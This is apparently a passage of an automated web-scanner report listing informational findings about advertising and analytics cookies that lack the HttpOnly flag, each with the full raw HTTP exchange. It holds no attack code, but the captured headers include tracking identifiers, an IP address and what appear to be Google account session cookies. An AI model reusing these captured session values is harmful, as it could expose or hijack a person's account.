GET /clk;141652382;20702477;a?http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.orbitz.com/psi?type=hotel&market=Boston,United%20States&checkin=2011-10-04&checkout=2011-10-07&guests=1&rooms=1&WT.mc_id=o_igo_merch_city_dated&WT.mc_ev=click&gcid=C11287x600-CYBoston,United%20States
Set-Cookie: id=c9aced83c00000a|644190/486643/15250|t=1317600576|et=730|cs=002213fd4868e541ded676c08a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:36 GMT
Date: Mon, 03 Oct 2011 00:09:36 GMT
Server: GFE/2.0
Content-Type: text/html


14.103. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

14.104. http://ads2.adbrite.com/v0/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v0/ad?sid=1861717&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; b="%3A%3A13beg%2C15sx4"

Response

HTTP/1.1 200 OK
Set-Cookie: b="%3A%3A13wid%2C13beg%2C15sx4"; path=/; domain=.adbrite.com; expires=Tue, 02-Oct-2012 01:53:09 GMT
Set-Cookie: vsd=0@1@4e891585@ads.pubmatic.com; path=/; domain=.adbrite.com; expires=Wed, 05-Oct-2011 01:53:09 GMT
Content-Type: application/x-javascript
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 03 Oct 2011 01:53:09 GMT
Content-Length: 298

document.writeln("<script type=\"text/javascript\">\nvar pubId=26620;\nvar siteId=26621;\nvar kadId=21556;\nvar kadwidth=300;\nvar kadheight=250;\nvar kadNetwork=6;\nvar kadtype=1;\n<\/script>\n<scrip
...[SNIP]...

14.105. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tase/ad?AdBoxType=15&url=virgin.dr.dfa&inv=doubleclick&rnd=1317602293772&esc=0&CustomQuery=eaid%3D245735545%26epid%3D70101326%26esid%3D1128332%26ecid%3D43398155%26ebuy%3D5794457%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317601703104_282600831_ap3104_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|; p270r=b$u-7#A.8Qp|i-1401516#1.8Qp|i-1643195#1.8Qp|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1317602404442_239271924_as3101_imp|194#1317602404442_239271924_as3101_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/tase
Set-Cookie: p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Set-Cookie: p194r=b$u-98#5.8Qp|i-tracking#..2.8Qp.2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:40:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:40:03 GMT
Content-Length: 2204

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1317602404442_239271924_as3101_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1317602404442_239271924_as3
...[SNIP]...

14.106. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d928398/20/44069375/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d928398/20/44069375/decide.php?ord=1317600550 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:01 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b103.dl
Set-Cookie: CS1=deleted; expires=Sun, 03 Oct 2010 00:10:00 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1_44069375-20-2_928398-1-3; expires=Thu, 22 Nov 2012 16:10:01 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_873769-]|@~M-0_928398-C|@~M-Vp; expires=Thu, 22-Nov-2012 16:10:01 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.107. http://api.wipmania.com/jsonp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.wipmania.com
Path:   /jsonp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsonp?callback=jsonp1317602099165&_=1317602106541 HTTP/1.1
Host: api.wipmania.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:35:09 GMT
Content-Type: application/x-javascript
Connection: close
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: application/javascript; charset=utf-8
Set-Cookie: uid=xw/qB06JAz2HWy4DCzpOAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.wipmania.com; path=/
Content-Length: 157

jsonp1317602099165({"latitude":"44.9718","longitude":"-113.3405","zoom":3,"address":{"city":"-","country":"United States","country_code":"US","region":"-"}})

14.108. http://apis.google.com/js/plusone.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apis.google.com
Path:   /js/plusone.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plusone.js HTTP/1.1
Host: apis.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotelplanner.com/Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=F8u0EXbNU4KGhvc02SYfdp-DEFElXzMn6jXCTpOMvEOJYkdCLz3OJlTrIyDS_Aq137v2MBKPkV6-2QEY3WGlenJjN02KGhLt0GGahhHj45EKWRTWFnwTHKW2IIFkuGEp; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjXmxcb1SChjECiXSjEaqO-DnawkdCeNdpQ1eq5H7VQaB1TYoVNaHivfCOnRdR3nNOQ08CAf6CRApbTves9jTDvA3EsEz817LyYCYCbZsTHriQICDzjjFZGK6LqC9xB10_TSh1omi0Cz3S6WTEQKI4YWzinp7wd_vo_RGZ0Q7Pmh8a7ryXTtM1Q9zJgPjGhZAWlQtcmVUtvW6l7weDo9XnzQ4xsrHMoS73ySwvooWqNnqucKMrgZgH8M9keX_Pz9mAcFTAqTRl1KdCO3svISfz05dJpITuMlwLigsrRt_DeV0

Response

HTTP/1.1 200 OK
Set-Cookie: SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjiseRQ5RQhy1HkhvGkXHmsNhgjgFcxIvEQml1xQy4kfn3D8kLNKn65zc1MAG0lQZ9fXoBuBEQv5EZpYNngUVXPJs8CkJJcRIXe7Mv4nXsVmtUd53Kjtci_dg4wZmFbdS0AW4_-GZxkHqFNrF7oBEHAXDX5EInFgoM8uJfPLnmq7RtE08Jv7niuGLAj0uzqGrVCu1FFm4HJYTnPW9Cf3H_wYqq2_t8bjpwOZX7v82cbjjersLVCT9TQrY5ODnCVnC-N_HE7HvI1ocYVAocXOlzaoLWJ_Wb1dvDoeYQr2-aU4c;Domain=.google.com;Path=/;Expires=Thu, 30-Sep-2021 00:09:20 GMT
Content-Type: text/javascript; charset=utf-8
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Mon, 03 Oct 2011 00:09:20 GMT
Date: Mon, 03 Oct 2011 00:09:20 GMT
Cache-Control: private, max-age=3600
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 5319

window.___jsl=window.___jsl||{};
window.___jsl.h=window.___jsl.h||'r;gc\/23980661-3686120e';
window.___jsl.l=[];
window.__GOOGLEAPIS=window.__GOOGLEAPIS||{};
window.__GOOGLEAPIS.gwidget=window.__GOOGL
...[SNIP]...

14.109. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1317599974.004,wait-%3E10000,&1317599980689 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p119936314=exp=1&initExp=Sun Oct 2 23:59:13 2011&recExp=Sun Oct 2 23:59:13 2011&prad=71054945&arc=43921374&; BMX_G=method->-1,ts->1317599953; BMX_3PC=1; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:01:20 GMT
Content-Type: image/gif
Connection: close
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317599974%2E004%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

14.110. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p119936314&PRAd=71054945&AR_C=43921374 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; UID=9cc29993-80.67.74.150-1314836282

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 03 Oct 2011 00:00:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Mon Oct 3 00:00:22 2011&prad=71054945&arc=43921374&; expires=Sun 01-Jan-2012 00:00:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26670

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"71054945",Pid:"p119936314",Arc:"43921374",Location:C
...[SNIP]...

14.111. http://as.chango.com/links/adunit/1.31759988192e+12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

